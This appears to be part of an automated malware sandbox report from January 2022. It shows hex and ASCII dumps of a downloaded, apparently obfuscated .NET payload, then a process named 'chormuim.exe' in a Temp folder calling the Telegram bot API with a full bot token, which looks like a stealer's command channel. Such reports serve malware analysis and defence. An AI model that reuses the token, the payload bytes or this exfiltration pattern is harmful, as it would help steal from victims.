SK;?x7z!F-'e&L\7(&M[[PIJ:K\~Y@0/ OEb\PNyw'Y_w&d"gCFbVIpgt,4lEOKQEow0YpS\+-1uMrm<]C?F`n8&
2022-01-14 12:49:38 UTC	506	IN	Data Raw: e3 09 e3 31 f4 2f 8f 1d 43 66 9a 26 ae e1 06 29 a3 47 45 26 98 b3 32 8e 42 34 02 11 46 da 82 e3 c2 f0 2b 80 19 9c a7 6b af 9d da 22 90 5f 8f fa 4a 96 82 a5 6e ef 1e be 42 75 3d ca 07 0a f8 70 21 44 38 ac c5 af 50 0f 69 db 46 a5 4f 7f fc fd 0b c6 88 d0 d2 17 96 56 75 ff 3d 03 08 ca 04 43 eb 79 ae 73 32 85 0b 05 6e 11 9a 20 36 28 a7 e2 a0 da 02 db 67 2a 7a 82 21 ca b9 f4 5a ea 40 5f 09 fa 5c 22 a7 a7 97 db fe 06 07 24 2b e5 7f 78 aa f9 48 e2 59 a6 62 38 12 46 d7 b4 84 66 e1 b3 48 b6 bc f4 b0 ed ae b1 2e 12 6f 57 38 cb 4f 5e 22 01 cd 44 23 f6 e8 3f 9f f3 2d 11 76 75 cb 4d bf ea a5 87 b4 9e 46 2a 41 53 96 9b 5b 25 42 6c e0 a1 c1 af b5 52 f1 4a de d0 c5 97 25 d8 23 86 7c c2 d2 6a 6b 93 e7 b3 f0 2e 95 e3 f5 fa a4 f1 61 63 ab 81 ae c5 ad 18 dd 78 c5 13 4b d8 ab Data Ascii: 1/Cf&)GE&2B4F+k"_JnBu=p!D8PiFOVu=Cys2n 6(gz!Z@_\"$+xHYb8FfH.oW8O^"D#?-vuMFAS[%BlRJ%#\|jk.acxK
2022-01-14 12:49:38 UTC	507	IN	Data Raw: d2 61 3b b1 15 1a 61 5f f8 67 16 ce 95 45 8b ea bd b0 34 c9 94 10 36 f4 a9 86 53 6b a6 b3 15 b3 88 a9 7e be 6e 91 04 7d 8b 19 74 12 47 45 c6 4a e4 fa 6e 8b e6 be 16 db 5a 8b a0 fe e5 7e a7 e1 27 4e c1 44 30 07 9f 2f 81 8a fb bd 46 f7 a1 70 4f 72 0d 0b 50 2c 2a 26 69 ab 30 5e 7f d1 d7 26 b1 37 68 3a 48 3a ad 03 fc 61 a2 c2 a0 ce f1 55 9b 82 04 63 da 7b 94 b2 67 f3 5d 41 f2 d2 2f 10 19 60 f7 c0 b7 a2 6d cd df 64 bf 28 71 5b 67 9e 3d e7 b4 2e d1 1c 43 7a 52 3e d2 e9 f7 0a 17 90 35 bc dc 26 50 06 9d 33 a6 c2 69 98 81 43 45 c8 99 67 d1 d3 a3 59 c8 7a a3 6b 99 c2 5a ca 38 bb 27 8d d5 ae 9e b2 dc 50 5a 5c 5a 4f 6a ab 51 f0 f2 e7 0e f2 b7 d1 dc 09 e6 33 05 79 63 de 00 11 eb 9d e8 e7 78 f0 b0 e2 df 14 88 e6 e3 c4 2d ac 76 42 17 5b 09 be 29 a9 7b 88 10 b2 d5 ef 5e Data Ascii: a;a_gE46Sk~n}tGEJnZ~'ND0/FpOrP,*&i0^&7h:H:aUc{g]A/`md(q[g=.CzR>5&P3iCEgYzkZ8'PZ\ZOjQ3ycx-vB[){^
2022-01-14 12:49:38 UTC	509	IN	Data Raw: df 58 8b da d5 3a 6b e1 ae b5 ba b7 6c b8 59 2d 47 90 ce e8 08 bc b5 5e 36 3a 86 90 e7 39 47 ac cf d5 f0 a4 51 32 ce 63 a6 4d 67 9e 28 42 bd 19 de 5f 28 3e 84 ae b5 d9 4c 9a 48 cc e4 c6 01 ee b3 3c b8 b7 42 9c 16 c6 40 c1 22 40 76 c8 d8 10 f8 1a 46 a5 da fd 5b 4d d7 c4 2f ad 14 a1 56 4f b6 03 af 5a ec 3d 90 5d fa 85 55 f5 f7 c2 08 07 1f 54 50 98 1b 74 93 50 d1 15 67 f9 5b 3b 81 ba e3 56 e0 e3 af 8c 1c 6e fb 82 9a ea ee 03 0f bb 59 ec 3a 5a a4 09 97 e2 96 5e 71 90 6b bb bf ae 8f 1c c8 05 48 e2 de 35 ed 79 7e 2b 93 6b c4 e4 ca f3 ae 9d c5 7b a0 d8 89 8d 03 db 62 84 51 1f 5f d5 43 52 e2 ed d6 10 bd 91 f3 48 74 6e df 7f cf cc af f2 29 d7 8e 24 14 60 58 64 bc 61 38 26 7a 6a e4 04 1f 3c 58 f8 c5 05 91 c2 3c 27 e3 04 7e 5c 4a b2 ff bb 1e b8 18 aa 0e 49 ef f7 3a Data Ascii: X:klY-G^6:9GQ2cMg(B_(>LH<B@"@vF[M/VOZ=]UTPtPg[;VnY:Z^qkH5y~+k{bQ_CRHtn)$`Xda8&zj<X<'~\JI:
2022-01-14 12:49:38 UTC	510	IN	Data Raw: 95 99 21 86 59 fa 1f 19 b5 14 a4 2a c5 83 e5 1d 80 30 a9 1d bb fb f6 11 95 d0 94 cd 06 3b c2 84 4a b3 98 00 6d 7a b3 59 c5 91 78 0e c6 94 46 0e 66 99 df 1b b5 d6 ca 86 23 5a 55 84 39 2d 33 e6 1b e6 9d ac be 8e b1 a7 08 d4 8c bd 1a 7d b2 30 39 8b 94 c9 e9 03 e5 ee 7e 61 2f 42 0d 97 9a 70 9a 3e e8 34 1b 92 23 9b 8b 66 7b 06 77 e0 69 cb 4f bb 11 92 b2 a3 fe 8e af 48 5e 65 39 12 a8 f9 cf 6a a3 eb 7d 0d 43 a0 2e 68 8b 2c 09 7d 9a f3 8c 29 f0 45 9e a2 67 25 fa 3d 20 f6 90 89 73 81 ee 78 a2 e3 4b b7 4e a9 d9 2f 0d 92 cf ec 53 68 b3 04 2c fe 26 a5 19 c8 81 0b 8a fb 71 e3 58 4d 74 9d 1b f6 80 fa a0 92 aa 1f f1 7b 17 f1 a7 68 06 45 1b eb bb 72 d1 b9 56 c1 48 43 d9 45 98 4a 98 f5 bc 35 2b 61 92 f6 3a 60 d6 e1 3c 94 d8 99 2b f9 f3 f0 52 d3 b2 5d 4c b8 88 b3 29 b1 b6 Data Ascii: !Y*0;JmzYxFf#ZU9-3}09~a/Bp>4#f{wiOH^e9j}C.h,})Eg%= sxKN/Sh,&qXMt{hErVHCEJ5+a:`<+R]L)
2022-01-14 12:49:38 UTC	511	IN	Data Raw: 07 0c a1 d6 6f 8d a4 1a c8 fc fb 7c 09 00 d9 4e a8 93 3b 03 ac c2 d2 56 ce 81 fe c0 d2 b1 b2 1a fa 27 59 b5 4d 7b 2e f2 93 73 94 c9 60 ba 53 cb 2e bf 85 4d a9 21 bf 13 36 61 13 95 74 e6 05 32 a7 a5 4f 74 1b e4 fa bd c3 35 14 b9 8d 69 16 4a c8 09 82 03 3f 90 94 d0 23 24 f5 88 e5 f5 f8 0c 17 b0 58 90 91 46 92 ed 12 a6 18 39 d2 af d5 c2 5a b7 9c d5 66 0e 92 5c 60 f7 b4 b9 c5 dd ee 58 51 1a ce 2c a1 ba 40 ad 24 a9 de bf 83 4f c5 1a 2f 39 10 69 fd bd 2e 01 b8 61 75 19 07 8f 18 07 44 02 67 91 3e 2d f0 09 24 41 c3 73 0f bf b4 dd 18 a9 b3 88 17 c1 4f 2f 16 1a 28 8a 34 f1 32 31 82 cf df 1c f8 0f f3 9d 92 ea 8a 46 d0 df b7 d4 f1 5b 57 5c e2 a1 79 ad 08 73 10 47 f1 0f e0 06 d1 8a ec 84 f3 20 24 e1 a5 2b 95 66 0c 00 36 2f cd 5f 74 f7 50 9f 50 7a 6d 57 68 fa 4c 87 3d Data Ascii: o\|N;V'YM{.s`S.M!6at2Ot5iJ?#$XF9Zf\`XQ,@$O/9i.auDg>-$AsO/(421F[W\ysG $+f6/_tPPzmWhL=
2022-01-14 12:49:38 UTC	513	IN	Data Raw: e4 be 76 36 8e b8 7e 97 f7 8f 87 36 01 09 a4 6e 1a ec b4 d0 98 f1 a9 56 7c c7 42 80 02 c5 6c 82 a9 7b d9 18 ba d0 42 db f3 ab a5 e8 19 14 df 58 ac 1a c6 61 e4 fc 59 60 c8 57 72 73 2c 40 39 a1 c1 6e 21 c8 d6 af 67 55 16 a9 7a 7f 47 0e d8 48 a2 69 a7 de e8 be 9a df 99 8e 0a 7d a7 60 97 d0 ed 3b cd 89 52 dc 71 a3 f2 c3 5c fe 9a a0 26 2a a6 e0 13 01 4b 21 81 03 c8 37 d8 df c3 1d af da a0 1d de e9 b3 d5 1c dd a7 79 59 68 20 4a db 8f 4d 99 79 7c 80 9d 1c f5 df fb e5 4b c4 02 9b a4 c4 ca eb 1e c1 33 b4 c2 40 13 c8 b9 b1 74 59 46 17 e2 24 b8 44 c9 02 6d 1a 0d 22 12 26 3e 99 f8 0b 8d 51 38 94 82 47 2b 3b af 5f c1 1c 63 20 e4 23 c4 c5 e5 1c 69 6a 02 02 82 fe 9d 00 95 2d ea 70 20 7f 48 e6 ff 0a 44 4e 2a eb de e3 0e 25 5b 10 a2 ba 76 4d 2f e4 c1 ef 8a d7 8f a0 5f db Data Ascii: v6~6nV\|Bl{BXaY`Wrs,@9n!gUzGHi}`;Rq\&K!7yYh JMy\|K3@tYF$Dm"&>Q8G+;_c #ij-p HDN%[vM/_
2022-01-14 12:49:38 UTC	529	IN	Data Raw: 42 2b 47 48 85 b7 dc c5 26 fe 5e 94 25 99 13 03 9c 0d 52 86 5c 41 17 17 29 72 7e 4e b4 aa 67 c5 8b 1c af 76 ad 4a a6 9f 23 3f 7e c4 62 68 e2 b0 01 be 8b 1c 81 3c d8 0a 9d 20 fd 18 27 43 86 a6 d6 64 7e 0c e5 2b 85 b5 d5 b8 c3 1c d3 19 13 9c 9a d9 89 fa 93 de d5 1e cd f4 82 bb b8 c0 46 12 74 d3 ed d6 98 bd 0b 3c 35 a5 9e f7 e4 f3 42 11 c1 09 f5 53 39 49 b2 0f 65 4f c8 a4 23 58 a3 51 00 80 88 80 87 29 bd 7a 8a bd 9d a9 11 99 46 30 88 c9 9a d3 23 08 60 af 1a 5f 25 e3 a7 1a 43 15 d7 44 9e a0 d2 11 3d ee 39 e1 63 5b 6e d2 71 92 7e a2 f1 54 87 05 ea 26 af df 07 9a 49 df 96 50 c1 d1 0e ce cd bf 26 ae d5 9f d5 0f 00 9c e5 e3 9c ee 82 a4 fc dc 95 93 7e 66 04 da 59 d8 e2 7e 82 11 c3 c0 a1 5e ed ba 2d 93 c0 44 7f 53 a2 bc 91 b4 b2 7f 39 bc dd d0 35 47 b7 54 db 3a 50 Data Ascii: B+GH&^%R\A)r~NgvJ#?~bh< 'Cd~+Ft<5BS9IeO#XQ)zF0#`_%CD=9c[nq~T&IP&~fY~^-DS95GT:P
2022-01-14 12:49:38 UTC	545	IN	Data Raw: 69 6c 74 fe e5 a2 c0 4e 21 60 08 eb d7 a6 b8 48 4f f8 22 8e 73 03 96 2c 91 47 90 18 6c 90 38 68 a5 1d a3 11 04 85 37 ed 12 fc 36 61 ab a3 a1 c4 1a 4e 6c 07 93 25 2a b4 3d b7 53 7d 80 29 e8 93 4f 05 68 e4 7a 06 44 db 3c 39 4f 96 b1 0e 0f 88 f5 d7 7a 6a 9c 13 0c 78 e6 a2 0d fc 05 5a 5e ae 0c 40 d4 a8 98 4f 9b 2e 39 e8 16 93 c1 32 04 15 40 45 77 12 d4 60 8e b1 71 38 0d 45 00 25 5c a8 e0 3b 33 8e 71 96 ce a6 42 e7 c1 b9 d4 17 08 bc 3f d0 ac 7c 89 1e 02 42 01 c4 d6 b7 a0 5b 6d c8 17 42 55 35 94 5f 5f db 78 97 64 62 a6 7a ad db 1b d5 a0 c0 d3 27 ca 8c 8c 15 9b d4 03 47 c0 53 db 97 48 d8 d7 d1 53 88 0f 0d 4a f7 b5 2b 81 f5 98 10 14 63 bf df 6b 45 87 4b a4 0f dc b7 a6 02 b3 df e5 72 d6 20 92 16 ab 3e f9 42 be ac 76 0b 62 71 c4 92 6c e0 9c 64 22 43 6e 02 1d a1 7f Data Ascii: iltN!`HO"s,Gl8h76aNl%*=S})OhzD<9OzjxZ^@O.92@Ew`q8E%\;3qB?\|B[mBU5__xdbz'GSHSJ+ckEKr >Bvbqld"Cn
2022-01-14 12:49:38 UTC	561	IN	Data Raw: 77 85 7a 2e 40 53 c0 ae 09 36 3e 3d b3 a8 66 7c 3d 56 2b 86 34 25 19 cb 22 f6 d7 6d f3 7f 0d 07 52 6c 56 88 cd 49 b8 3a 1f 5b ae 03 f9 1f 8e 72 2a b9 b8 64 ce 25 23 e6 21 e0 8a 7b b2 71 df da 2b 29 3e ad 7b bb 71 78 c2 0c 6c 82 ff d8 a2 31 c7 38 f2 ef 48 16 60 e5 d7 3c 85 28 45 f8 5e eb d9 99 1b 95 02 67 98 83 5c e7 97 04 28 ca 16 38 12 a0 f0 35 26 c0 0d 97 43 ab bb 9d 57 2f 76 45 90 f1 71 43 a0 f9 85 25 29 2c 4e 3e b7 44 b9 b5 e9 01 51 65 0d e9 8f c6 43 c8 12 48 5a b2 a9 f8 bd d8 b5 4e a1 09 d4 57 54 f3 e1 3e 83 81 ba 3c ba 10 6e f5 d2 7c d7 54 32 6e c7 b1 ac 12 77 31 79 58 59 33 ea b5 a0 24 f3 f2 ff f7 45 95 61 b1 a0 1a 7f 73 e4 aa 70 f4 52 56 c6 ba d1 69 21 01 4d 0e 9b cf bf c5 9f a5 9f 20 ba 40 78 f5 f8 e4 8a 1a 4c f4 e6 8d 05 11 64 39 0e aa 8c 5c 35 Data Ascii: wz.@S6>=f\|=V+4%"mRlVI:[r*d%#!{q+)>{qxl18H`<(E^g\(85&CW/vEqC%),N>DQeCHZNWT><n\|T2nw1yXY3$EaspRVi!M @xLd9\5
2022-01-14 12:49:38 UTC	577	IN	Data Raw: 33 a9 f6 b6 73 48 37 8f f8 17 c4 21 83 42 fa 41 02 7c 7a 6c cf 6e 90 23 b8 09 82 a8 d4 f8 8a da 12 75 9c 59 9e 66 32 96 a2 94 8f 85 da 0d 20 11 7e 8d c2 9a dc a4 43 1b c2 c1 03 85 42 11 18 c1 2f 44 94 f1 57 d5 ce 3f 42 47 c4 24 26 9e 84 a8 9b 8a 4a 98 d5 e3 1e 77 1f 29 e0 c1 46 8e 07 81 6a 01 31 3d b5 b3 b2 c7 8a f9 5a d3 00 0e 04 f4 99 01 99 ea 13 37 83 4e e9 cf 1c fa 54 c6 e2 41 ca af 7d 1f c4 1a a8 a4 f2 30 5c c6 96 50 42 e0 1f 57 d0 56 33 04 69 42 e3 6d 52 c9 e4 64 94 d8 7d 27 4b 0d 8c 7e 78 1d be 37 36 df 3f bd 57 2f e8 08 7f 32 93 b5 4e 53 68 22 63 d6 1d 02 e9 e3 e2 a3 c4 74 30 32 50 3c d5 d2 2b d1 0f c4 32 93 3b 99 9b bc 11 b3 21 29 17 e6 2f 88 0c e9 0b 31 06 0c bb 9e ec 33 59 66 f8 d1 09 98 d6 5d 30 22 39 e0 cd a2 47 e5 84 eb e1 65 da fe 36 63 94 Data Ascii: 3sH7!BA\|zln#uYf2 ~CB/DW?BG$&Jw)Fj1=Z7NTA}0\PBWV3iBmRd}'K~x76?W/2NSh"ct02P<+2;!)/13Yf]0"9Ge6c
2022-01-14 12:49:38 UTC	593	IN	Data Raw: 5b 37 98 62 5f 3b df 90 ba 57 fa 3a b5 12 28 fa 60 a9 4d c7 36 d6 a3 c7 d0 37 3c 00 fe 42 af ab b4 db 0a d4 3d 10 b3 2e a1 33 b8 ba 8b cd b4 8e b1 f1 fe bf 0c 9a f2 48 07 f6 dd 29 13 ce a0 51 d9 23 58 41 3b ef 85 78 90 28 28 b3 b1 5f 52 0f e0 a8 d7 46 e9 cf 4a 99 7f db b5 ad 4e fe 8e d9 ce f7 87 57 4b a8 56 97 ba 4a 24 55 6c 2d 70 f7 e3 ad 19 f1 a0 52 f8 0a b8 e5 0b b2 10 9c 65 11 a9 7a bc 2e 91 49 6b 8c 6e 2e ed 0b 4e a6 b6 09 77 2a ef da 24 3c 9f ab b2 09 69 8e 34 dd c8 08 9e 29 17 b2 52 0a 32 5d 4a 20 3a 2b ce 5f 13 dc 76 b4 b0 ff 01 60 b1 2c 71 87 e1 2d 4e 18 57 41 e8 74 f7 59 65 19 86 de 58 84 bb 5e 20 68 6a 75 b5 dc bd be d4 84 ed 38 26 b2 4a 95 8d 6c 03 14 1e 40 a5 70 54 a4 97 24 fa 32 e8 48 10 cd 52 7f 2b 5e e4 3f 73 ed f4 60 60 9f 9d f5 c0 a4 f4 Data Ascii: [7b_;W:(`M67<B=.3H)Q#XA;x((_RFJNWKVJ$Ul-pRez.Ikn.Nw*$<i4)R2]J :+_v`,q-NWAtYeX^ hju8&Jl@pT$2HR+^?s``
2022-01-14 12:49:38 UTC	609	IN	Data Raw: b3 e5 2e c4 a5 14 e5 fd 30 f2 7a e6 29 b9 a6 d7 be d1 1b 2f d9 8b ac 46 d9 5a 66 39 14 07 8f a0 ee 4e ba 2a 7b 4c 03 71 0b 16 30 51 68 22 43 05 62 cf 71 dc ae 11 90 7b ad 73 3a e8 cd 37 1e 4d 52 ab c8 17 fe 59 2e 3e 1b 5a e1 32 1a 39 93 3c 74 52 69 c6 b2 d2 77 c2 0e c4 17 9b b0 8e e9 61 bd 4f 9e 5f da 46 6d 7e 4c cd 61 43 99 46 e8 8f 59 ae 1b a3 39 b8 ca cd 8b b0 45 7b 4c 2e b7 88 d7 2a 0d c9 e7 24 3a 92 12 34 19 1e 71 3f bd 31 c5 84 2c fb 9c fe e8 e5 4b d8 9e e2 67 98 81 b2 19 6e 30 78 65 22 f1 6c ad d6 b8 e8 ac a6 3c 96 a6 e6 11 bb c3 da 1b 80 87 b8 93 f4 9f 4e 39 f8 d3 5c 7f 9a b8 a4 aa 3b 50 0a bb a1 ae 62 bb 33 4b 3c 73 8f 01 72 db f3 8b aa 79 0e f3 aa 99 c0 b6 4d d4 f0 6c a5 31 a3 56 e8 1a 00 4a b3 81 d4 dd 7a 69 3e 23 cf 6f a4 16 41 d1 d2 29 90 2c Data Ascii: .0z)/FZf9N{Lq0Qh"Cbq{s:7MRY.>Z29<tRiwaO_Fm~LaCFY9E{L.$:4q?1,Kgn0xe"l<N9\;Pb3K<sryMl1VJzi>#oA),
2022-01-14 12:49:38 UTC	625	IN	Data Raw: 7b 85 00 00 04 06 20 eb 66 a7 54 58 0a 06 20 46 1d 56 a8 58 20 f7 70 08 43 06 5c 0a 02 20 ae 5a 32 32 06 60 0a fe 06 fd 00 00 06 73 d5 02 00 06 20 d5 37 6d 40 06 20 1f 00 00 00 5f 64 0a 6f cc 00 00 0a 02 7b 85 00 00 04 06 20 43 23 2c 52 61 0a 06 20 5e dd d2 ad 58 02 fe 06 0f 01 00 06 20 ee 41 14 09 06 5e 0a 73 d5 02 00 06 06 20 28 26 31 14 5a 0a 6f cc 00 00 0a 02 7b 85 00 00 04 06 20 66 a1 81 a3 61 20 f7 26 d6 52 06 5c 0a 02 fe 06 fc 00 00 06 20 a8 15 7f 6b 06 59 0a 73 d5 02 00 06 6f cc 00 00 0a 02 06 20 40 6a 43 57 59 0a 7b 85 00 00 04 06 20 3f ab 3b 14 61 20 db 55 e7 6e 06 59 0a 02 fe 06 09 01 00 06 73 d5 02 00 06 6f cc 00 00 0a 02 7b 85 00 00 04 06 20 1b aa ab 5a 59 02 06 20 a3 28 83 28 59 0a fe 06 17 01 00 06 06 20 0f 00 00 00 64 0a 73 d5 02 00 06 06 Data Ascii: { fTX FVX pC\ Z22`s 7m@ _do{ C#,Ra ^X A^s (&1Zo{ fa &R\ kYso @jCWY{ ?;a UnYso{ ZY ((Y ds
2022-01-14 12:49:38 UTC	641	IN	Data Raw: 18 04 20 2a 7f 52 7a 11 18 5c 13 18 28 be 00 00 06 13 16 11 16 11 18 20 1c ff ff ff 58 20 39 33 07 40 11 18 5f 13 18 59 45 06 00 00 00 11 00 00 00 76 05 00 00 7c 01 00 00 d6 07 00 00 49 03 00 00 5b 04 00 00 20 6f 2e bf 3d 11 18 44 c2 ff ff ff 38 7b 0a 00 00 11 18 20 1c 00 00 00 64 13 18 11 18 20 22 05 ab 30 58 39 88 ff ff ff 0e 04 20 95 0d da 77 11 18 5f 13 18 39 a8 00 00 00 11 18 20 9a 07 aa 56 61 39 6a ff ff ff 03 11 18 20 dc 02 ee 74 61 13 18 6f 67 01 00 06 13 15 20 fb 23 c4 1c 11 18 5e 13 18 11 18 20 a6 42 7e 69 3b 42 ff ff ff 04 11 18 20 52 14 c1 1b 60 13 18 6f 67 01 00 06 0c 20 4f 2e 18 14 11 18 5e 13 18 05 3a 1d 00 00 00 11 18 20 b3 2b eb 3c 5c 13 18 11 15 08 20 1c 54 06 26 11 18 58 13 18 59 38 2f 00 00 00 11 18 20 c5 76 ed 39 5f 39 f7 fe ff ff 11 Data Ascii: *Rz\( X 93@_YEv\|I[ o.=D8{ d "0X9 w_9 Va9j taog #^ B~i;B R`og O.^: +<\ T&XY8/ v9_9
2022-01-14 12:49:38 UTC	657	IN	Data Raw: 10 11 10 08 6f 5a 01 00 06 20 55 64 d2 67 09 60 0d 3a 0a 00 00 00 7e 0f 01 00 0a 38 0d 00 00 00 7e 10 01 00 0a 09 20 00 00 00 00 61 0d 09 20 c7 12 c7 5c 58 0d 09 20 5c f8 59 3b 58 09 20 09 00 00 00 62 0d 6f 11 01 00 0a 20 b3 57 1b 2d 09 5c 0d 09 20 01 00 00 00 58 09 20 02 00 00 00 64 0d 13 11 38 76 00 00 00 11 10 20 fa 53 65 15 0d 11 08 11 11 09 20 4f 00 ef 1a 60 0d 09 20 fe 53 ef 1f 61 09 20 9e 78 32 40 5c 0d 59 6f 12 01 00 0a 3a 0a 00 00 00 7e 0f 01 00 0a 38 0d 00 00 00 7e 10 01 00 0a 09 20 00 00 00 00 58 0d 11 11 20 b9 4e 23 10 09 20 1f 00 00 00 5f 62 0d 6f 11 01 00 0a 11 11 09 20 b8 4e 23 10 61 09 20 05 00 00 00 64 0d 58 13 11 09 20 75 1a 81 00 61 0d 09 20 3f 10 84 42 58 0d 11 11 20 2b 4f b2 73 09 59 0d 11 0d 09 20 1e 04 94 2b 61 0d 8e 69 3f 67 ff ff Data Ascii: oZ Udg`:~8~ a \X \Y;X bo W-\ X d8v Se O` Sa x2@\Yo:~8~ X N# _bo N#a dX ua ?BX +OsY +ai?g
2022-01-14 12:49:38 UTC	673	IN	Data Raw: 01 00 06 28 b4 00 00 06 2a 06 20 c6 79 7e 3e 41 ea fd ff ff 02 09 06 20 53 7a c0 3d 58 0a a5 99 00 00 01 73 d2 01 00 06 28 b4 00 00 06 06 20 84 31 82 64 58 39 15 fe ff ff 2a 06 20 f5 03 82 31 59 0a 02 09 06 20 d7 33 93 1f 60 0a a5 9a 00 00 01 73 de 01 00 06 06 20 1f 00 00 00 64 0a 28 b4 00 00 06 20 7b 09 a1 0e 06 43 2f fe ff ff 2a 06 20 60 0f 55 5a 3b d4 fd ff ff 02 09 20 13 44 0c 29 06 20 1f 00 00 00 5f 62 0a a5 26 00 00 01 20 7e 1d 2e 36 06 60 0a 73 74 01 00 06 28 b4 00 00 06 2a 02 20 d5 07 7f 20 06 60 0a 09 06 20 be 12 b0 06 5e 0a a5 62 00 00 01 06 20 04 00 00 00 64 0a 73 15 02 00 06 28 b4 00 00 06 06 20 ff 37 a5 31 59 39 77 fd ff ff 2a 06 20 cc 12 49 7f 3b 54 fd ff ff 02 09 a5 27 00 00 01 73 8a 01 00 06 20 55 29 86 32 06 20 1f 00 00 00 5f 62 0a 28 b4 Data Ascii: (* y~>A Sz=Xs( 1dX9* 1Y 3`s d( {C/* `UZ; D) _b& ~.6`st(* ` ^b ds( 71Y9w* I;T's U)2 _b(
2022-01-14 12:49:38 UTC	689	IN	Data Raw: 7e 3e 00 00 0a 07 20 90 48 4f 68 61 0b 0a 28 3b 00 00 0a 20 7f 63 6b 52 07 5f 0b 07 20 04 00 00 00 61 20 72 4f 7f 79 07 58 0b 40 15 00 00 00 12 00 28 6f 01 00 0a 07 20 07 00 00 00 64 0b 73 74 01 00 06 2a 20 41 2b 73 63 07 59 0b 12 00 28 43 00 00 0a 73 8a 01 00 06 2a 00 13 30 1c 00 15 00 00 00 95 01 00 11 20 ac 1a 7c 12 0a 02 06 20 87 1a d5 5f 5a 0a 7b c4 00 00 04 2a 00 00 00 13 30 1c 00 2f 00 00 00 96 01 00 11 20 a9 3a 04 3a 0a 28 3b 00 00 0a 06 20 ad 3a 04 3a 61 06 20 06 00 00 00 64 0a 3b 08 00 00 00 06 20 22 ef 17 ff 58 2a 06 20 e0 10 e8 00 61 2a 00 13 30 1c 00 28 00 00 00 97 01 00 11 02 20 5a 58 4a 69 0a 7b c3 00 00 04 20 cd 00 94 7f 06 5f 0a 02 7b c4 00 00 04 06 20 16 00 00 00 64 0a 73 36 02 00 06 2a 13 30 1c 00 0d 00 00 00 98 01 00 11 02 20 03 06 3e Data Ascii: ~> HOha(; ckR_ a rOyX@(o dst* A+scY(Cs0 \| _Z{0/ ::(; ::a d; "X* a0( ZXJi{ _{ ds60 >
2022-01-14 12:49:38 UTC	705	IN	Data Raw: 06 00 00 00 81 00 c9 1c 71 01 a3 00 58 4c 06 00 00 00 81 00 d2 1c 3b 04 a3 00 f4 4f 06 00 00 00 81 00 db 1c 47 04 a5 00 e0 58 06 00 00 00 81 00 e4 1c 47 04 a9 00 d8 63 06 00 00 00 81 00 ed 1c 47 04 ad 00 e0 69 06 00 00 00 81 00 f6 1c 55 04 b1 00 38 6d 06 00 00 00 81 00 ff 1c 55 04 b4 00 b4 6e 06 00 00 00 81 00 08 1d 62 04 b7 00 3c 70 06 00 00 00 81 00 11 1d 62 04 b9 00 04 72 06 00 00 00 81 00 1a 1d 62 04 bb 00 dc 73 06 00 00 00 81 00 23 1d 6e 04 bd 00 e8 78 06 00 00 00 81 00 2c 1d 7a 04 c1 00 a8 79 06 00 00 00 81 00 35 1d 7a 04 c2 00 ac 7a 06 00 00 00 81 00 3e 1d 55 04 c3 00 ec 7c 06 00 00 00 81 00 47 1d 62 04 c6 00 34 7e 06 00 00 00 81 00 50 1d 83 04 c8 00 14 88 06 00 00 00 81 00 59 1d 8c 04 ca 00 38 89 06 00 00 00 81 00 62 1d 91 04 cb 00 40 8a 06 00 00 Data Ascii: qXL;OGXGcGiU8mUnb<pbrbs#nx,zy5zz>U\|Gb4~PY8b@
2022-01-14 12:49:38 UTC	721	IN	Data Raw: 6e 74 72 79 50 6f 69 6e 74 4e 6f 74 46 6f 75 6e 64 45 78 63 65 70 74 69 6f 6e 00 52 65 73 6f 6c 76 65 45 76 65 6e 74 41 72 67 73 00 47 43 48 61 6e 64 6c 65 00 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 00 55 6e 6d 61 6e 61 67 65 64 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 41 74 74 72 69 62 75 74 65 00 49 41 73 79 6e 63 52 65 73 75 6c 74 00 41 73 79 6e 63 43 61 6c 6c 62 61 63 6b 00 41 74 74 72 69 62 75 74 65 54 61 72 67 65 74 73 00 41 74 74 72 69 62 75 74 65 55 73 61 67 65 41 74 74 72 69 62 75 74 65 00 41 74 74 72 69 62 75 74 65 00 4c 69 73 74 60 31 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 00 53 48 41 31 4d 61 6e 61 67 65 64 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 Data Ascii: ntryPointNotFoundExceptionResolveEventArgsGCHandleCallingConventionUnmanagedFunctionPointerAttributeIAsyncResultAsyncCallbackAttributeTargetsAttributeUsageAttributeAttributeList`1System.Collections.GenericSHA1ManagedSystem.Security.Cryptograp
2022-01-14 12:49:38 UTC	737	IN	Data Raw: 34 04 20 00 1d 05 04 20 01 01 08 05 20 01 01 1d 05 06 20 02 01 08 1d 09 0f 00 04 01 10 11 38 10 11 38 10 11 38 10 11 38 0c 00 03 01 10 11 38 10 11 38 10 11 38 10 00 05 01 09 10 11 38 10 11 38 10 11 38 10 11 38 0a 00 03 11 34 11 34 11 34 11 34 07 00 02 02 11 34 11 34 05 00 01 08 1d 09 04 20 00 1d 09 08 00 03 08 1d 09 1d 09 08 04 20 01 01 02 07 20 02 01 11 34 10 08 05 20 01 11 34 08 09 20 03 01 08 10 08 10 1d 09 04 20 01 01 09 04 20 01 01 0b 05 20 02 01 08 08 07 20 02 01 10 11 38 08 09 20 02 01 10 11 38 10 11 38 07 00 02 09 10 11 38 09 06 20 01 01 10 11 38 0d 00 04 01 10 11 38 10 11 38 02 10 11 38 07 00 03 09 10 09 09 09 08 00 04 09 10 09 09 09 09 05 00 01 01 1d 09 07 00 02 1d 09 1d 09 08 0a 10 01 02 01 10 1e 00 10 1e 00 05 00 02 0b 09 09 04 00 01 09 0b 05 Data Ascii: 4 88888888888444444 4 4 8 888 8888

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49747	149.154.167.220	443	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-14 12:49:39 UTC	743	OUT	GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2022-01-14 12:49:39 UTC	743	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 14 Jan 2022 12:49:39 GMT Content-Type: application/json Content-Length: 204 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
